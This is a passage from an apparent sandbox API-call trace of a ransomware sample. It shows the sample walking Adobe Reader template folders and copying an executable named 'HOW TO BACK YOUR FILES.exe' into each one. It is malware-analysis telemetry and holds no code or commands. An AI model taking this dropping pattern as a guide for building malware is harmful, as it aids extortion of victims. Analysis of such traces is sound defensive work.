ftLastWriteTime.dwLowDateTime=0x560a2da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.301] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.301] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.302] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE" [0061.302] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE" [0061.302] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.302] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sve\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.308] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.308] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SVE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805da3e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x560c8f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x560c8f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.308] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.308] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.308] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO" [0061.308] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO" [0061.308] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.308] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\suo\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.316] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.316] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SUO\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805b4280, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x560c8f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x560c8f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.316] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.316] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.316] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV" [0061.316] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV" [0061.316] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.316] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\slv\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.321] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.321] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a04a60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x560ef060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x560ef060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.322] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.322] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.322] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY" [0061.322] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY" [0061.322] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.322] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\sky\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.327] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.327] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SKY\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a04a60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x560ef060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x560ef060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.327] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.328] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.328] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS" [0061.328] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS" [0061.328] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.328] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rus\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.333] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.333] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a04a60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x560ef060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x560ef060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.333] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.333] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.333] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM" [0061.334] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM" [0061.334] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.334] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\rum\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.337] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.337] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\RUM\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a2abc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x561151c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x561151c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.338] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.338] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.338] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB" [0061.338] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB" [0061.338] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.338] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ptb\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.369] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.369] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805b4280, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x561151c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x561151c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.369] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.369] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.370] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL" [0061.370] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL" [0061.370] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.370] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\pol\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.377] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.377] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\POL\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80a2abc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x56161480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56161480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.377] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.377] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.377] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR" [0061.377] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR" [0061.377] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.377] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nor\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.383] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.383] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NOR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805da3e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x56161480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56161480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.384] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.384] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.384] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD" [0061.384] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD" [0061.384] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.384] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\nld\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.388] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.388] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\NLD\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805da3e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x561875e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x561875e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.388] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.388] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.388] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR" [0061.388] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR" [0061.388] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.388] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\kor\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.394] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.394] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805da3e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x561875e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x561875e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.394] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.394] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.394] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN" [0061.394] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN" [0061.394] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.394] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\jpn\\how to back your files.exe"), bFailIfExists=1) returned 1 [0061.405] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.405] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\JPN\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805da3e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x561ad740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x561ad740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0061.405] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0061.405] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0061.405] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA" [0061.406] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\ITA" [0061.406] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0061.406] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files 